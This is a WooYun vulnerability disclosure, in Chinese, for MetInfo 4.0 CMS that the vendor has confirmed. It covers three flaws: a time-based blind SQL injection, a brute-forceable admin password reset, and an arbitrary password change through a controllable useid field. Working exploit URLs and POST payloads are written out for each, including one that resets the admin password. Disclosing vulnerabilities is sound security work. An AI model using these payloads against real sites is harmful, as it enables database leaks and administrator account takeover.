当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102639

漏洞标题:metinfo 4.0 sql注射、任意密码爆破、任意密码修改

相关厂商:MetInfo

漏洞作者: 路人甲

提交时间:2015-03-23 10:50

修复时间:2015-06-23 13:58

公开时间:2015-06-23 13:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-23: 细节已通知厂商并且等待厂商处理中
2015-03-25: 厂商已经确认,细节仅向厂商公开
2015-03-28: 细节向第三方安全合作伙伴开放
2015-05-19: 细节向核心白帽子及相关领域专家公开
2015-05-29: 细节向普通白帽子公开
2015-06-08: 细节向实习白帽子公开
2015-06-23: 细节向公众公开

简要描述:

metinfo4.0 sql注射,任意密码爆破,任意密码修改

详细说明:

message/access.php:

<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
require_once '../include/common.inc.php';
if($met_webhtm==0){
$member_login_url="login.php?lang=".$lang;
$member_register_url="register.php?lang=".$lang;
}else{
$member_login_url="login".$met_htmtype;
$member_register_url="register".$met_htmtype;
}
$message_list=$db->get_one("SELECT * FROM $met_message where id=$id and lang='$lang'");


发送url:
http://localhost/MetInfo4.0/message/access.php?lang=cn&id=if%28ascii%28substr%28user%28%29,1,1%29%29=114,sleep%285%29,1%29
造成延时,可猜测敏感信息
member/getpasswd.php:

if($action=="getpassword"){
$admin_list = $db->get_one("SELECT * FROM $met_admin_table WHERE admin_id='$admin_name'");
if(!$admin_list){
okinfo('getpassword.php?lang='.$lang,$lang_NoidJS);
}
else{
$from=$met_fd_usename;
$fromname=$met_fd_fromname;
$to=$admin_list[admin_email];
$usename=$met_fd_usename;
$usepassword=$met_fd_password;
$smtp=$met_fd_smtp;
$random = mt_rand(1000, 9999);
$passwords=date('Ymd').$random;
$getpass=$passwords;
$passwords=md5($passwords);
$query = "update $met_admin_table SET
admin_pass = '$passwords'
where admin_id='$admin_name'";
$db->query($query);
$met_webnamearray=explode('--Powered by MetInfo',$met_webname);
$met_webname1=$met_webnamearray[0];


如果从数据库中查询到某人,就给某人邮箱发送密码:
看看这个密码:
$random = mt_rand(1000, 9999);
$passwords=date('Ymd').$random;
这个太简单了,时间我们可以得到,下来是一个四位的数字,直接爆破即可
metinfo登陆没有验证码:
发送url:
http://localhost/MetInfo4.0/member/getpassword.php?action=getpassword&lang=cn
postdata:
admin_name=admin&Submit=+%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81+
数据库是同一张表
然后直接登陆爆破密码即可(http://localhost/MetInfo4.0/admin/login/login.php)
下来看任意用户密码修改:
登陆一个用户点用户信息编辑,然后抓包:

if($action=="editor"){
$query = "update $met_admin_table SET
admin_id = '$useid',
admin_name = '$realname',
admin_sex = '$sex',
admin_tel = '$tel',
admin_modify_ip = '$m_user_ip',
admin_mobile = '$mobile',
admin_email = '$email',
admin_qq = '$qq',
admin_msn = '$msn',
admin_taobao = '$taobao',
admin_introduction = '$admin_introduction',
admin_modify_date = '$m_now_date',
companyname = '$companyname',
companyaddress = '$companyaddress',
companyfax = '$companyfax',
companycode = '$companycode',
companywebsite = '$companywebsite'";
if($pass1){
$pass1=md5($pass1);
$query .=", admin_pass = '$pass1'";
}
$query .=" where admin_id='$useid'";
$db->query($query);
okinfo('basic.php?lang='.$lang,$lang_js21);
}


这里逻辑太简单 userid可以控制,也就是说我们可以随意更改任何人的密码,包括管理员的:
http://localhost/MetInfo4.0/member/save.php?action=editor
useid=admin&lang=cn&pass1=111111&pass2=&realname=&sex=1&tel=&mobile=&email=test%40test.com&qq=&msn=&taobao=&admin_introduction=&companyname=test&companyfax=&companycode=&companyaddress=&companywebsite=&Submit=%E6%8F%90%E4%BA%A4%E4%BF%A1%E6%81%AF
抓取sql语句
update met_admin_table SET
admin_id = 'admin',
admin_name = '',
admin_sex = '1',
admin_tel = '',
admin_modify_ip = 'Unknown',
admin_mobile = '',
admin_email = 'test@test.com',
admin_qq = '',
admin_msn = '',
admin_taobao = '',
admin_introduction = '',
admin_modify_date = '2015-03-19 16:56:54',
companyname = 'test',
companyaddress = '',
companyfax = '',
companycode = '',
companywebsite = '', admin_pass = '96e79218965eb72c92a549dd5a330112' where admin_id='admin'
成功修改管理员密码为111111

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-25 13:57

厂商回复:

非常感谢您的反馈,这个系统漏洞我们已经在以后的版本中修复了。

最新状态:

暂无


漏洞评价:

评论